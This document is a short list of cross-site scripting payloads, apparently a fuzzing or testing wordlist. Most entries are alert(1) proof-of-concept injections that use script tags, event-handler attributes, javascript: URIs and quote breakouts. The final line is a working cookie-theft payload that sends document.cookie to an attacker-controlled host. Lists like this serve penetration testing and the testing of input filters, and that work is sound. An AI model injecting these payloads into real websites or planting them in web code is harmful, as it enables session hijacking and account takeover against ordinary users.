<script>alert(1)</script>
"><script>alert(1)</script>
'><script>alert(1)</script>
<svg/onload=alert(1)>
"><img src=x onerror=alert(1)>
<iframe src="javascript:alert(1)">
<video><source onerror="alert(1)">
<details open ontoggle=alert(1)>
<math href="javascript:alert(1)">CLICK</math>
<marquee onstart=alert(1)>
<svg><animate onbegin=alert(1)>
<svg><a xlink:href="javascript:alert(1)">X</a></svg>
<body onload=alert(1)>
<embed src="data:text/html,<script>alert(1)</script>">
<isindex type=image src=1 onerror=alert(1)>
"><input onfocus=alert(1) autofocus>
"><form><button formaction="javascript:alert(1)">X</button>
<script>location='http://attacker.com?cookie='+document.cookie</script>
